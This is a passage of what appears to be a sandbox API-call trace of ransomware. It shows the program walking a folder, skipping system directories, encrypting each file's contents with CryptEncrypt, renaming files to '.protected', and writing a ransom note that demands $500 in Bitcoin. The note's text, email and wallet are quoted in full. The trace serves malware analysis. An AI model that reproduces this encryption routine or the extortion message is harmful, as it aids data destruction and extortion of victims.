lpString2="RESTORE_FILES.txt") returned -1 [0095.208] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.208] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.208] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".rar") returned 0x0 [0095.208] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrW (lpFirst="MSN Autos.url", lpSrch=".zip") returned 0x0 [0095.209] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.209] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.209] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.210] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.210] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.210] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.210] CloseHandle (hObject=0xd4) returned 1 [0095.211] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.protected") returned 67 [0095.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.protected")) returned 1 [0095.211] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Windows") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files (x86)") returned -1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$Recycle.bin") returned 1 [0095.211] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="System Volume Information") returned -1 [0095.211] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.211] StrStrIW (lpFirst="MSN Entertainment.url", lpSrch=".protected") returned 0x0 [0095.212] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) 
returned 1 [0095.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".rar") returned 0x0 [0095.212] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0095.212] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".zip") returned 0x0 [0095.212] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.213] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.213] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.214] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.214] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.214] WriteFile (in: 
hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.214] CloseHandle (hObject=0xd4) returned 1 [0095.215] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.protected") returned 75 [0095.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.protected")) returned 1 [0095.215] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Windows") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files (x86)") returned -1 [0095.215] lstrcmpiW (lpString1="MSN Money.url", lpString2="$Recycle.bin") returned 1 [0095.216] lstrcmpiW (lpString1="MSN Money.url", lpString2="System Volume Information") returned -1 [0095.216] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrIW (lpFirst="MSN Money.url", lpSrch=".protected") returned 0x0 [0095.216] lstrcmpW (lpString1="MSN Money.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.216] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.216] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".rar") returned 0x0 [0095.216] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0095.216] StrStrW (lpFirst="MSN Money.url", lpSrch=".zip") returned 0x0 [0095.216] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.217] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.217] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.218] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.218] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 
[0095.218] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.218] CloseHandle (hObject=0xd4) returned 1 [0095.219] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.protected") returned 67 [0095.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.protected")) returned 1 [0095.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Windows") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files (x86)") returned -1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$Recycle.bin") returned 1 [0095.220] lstrcmpiW (lpString1="MSN Sports.url", lpString2="System Volume Information") returned -1 [0095.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrIW (lpFirst="MSN Sports.url", lpSrch=".protected") returned 0x0 [0095.220] lstrcmpW (lpString1="MSN Sports.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".rar") returned 0x0 [0095.220] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0095.220] StrStrW (lpFirst="MSN Sports.url", lpSrch=".zip") returned 0x0 [0095.221] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.221] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.222] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.222] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.222] 
WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.222] CloseHandle (hObject=0xd4) returned 1 [0095.223] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.protected") returned 68 [0095.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.protected")) returned 1 [0095.224] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Windows") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files (x86)") returned -1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="$Recycle.bin") returned 1 [0095.224] lstrcmpiW (lpString1="MSN.url", lpString2="System Volume Information") returned -1 [0095.224] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrIW (lpFirst="MSN.url", lpSrch=".protected") returned 0x0 [0095.224] lstrcmpW (lpString1="MSN.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) 
returned 1 [0095.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.224] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 [0095.224] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.224] StrStrW (lpFirst="MSN.url", lpSrch=".rar") returned 0x0 [0095.225] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0095.225] StrStrW (lpFirst="MSN.url", lpSrch=".zip") returned 0x0 [0095.225] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.225] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.226] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.226] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | 
out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.226] CloseHandle (hObject=0xd4) returned 1 [0095.227] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.protected") returned 61 [0095.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.protected")) returned 1 [0095.228] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Windows") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files (x86)") returned -1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$Recycle.bin") returned 1 [0095.228] lstrcmpiW (lpString1="MSNBC News.url", lpString2="System Volume Information") returned -1 [0095.228] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrIW (lpFirst="MSNBC News.url", lpSrch=".protected") returned 0x0 [0095.228] lstrcmpW (lpString1="MSNBC News.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC 
News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".rar") returned 0x0 [0095.228] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0095.228] StrStrW (lpFirst="MSNBC News.url", lpSrch=".zip") returned 0x0 [0095.229] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.229] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.229] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.230] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.230] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.230] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.230] CloseHandle (hObject=0xd4) returned 1 [0095.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.protected") returned 68 [0095.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.protected" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.protected")) returned 1 [0095.232] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.232] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.232] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\RESTORE_FILES.txt") returned 61 [0095.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.235] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.235] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.236] lstrlenA (lpString="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") returned 684 [0095.236] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.236] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.236] WriteFile (in: hFile=0xb4, 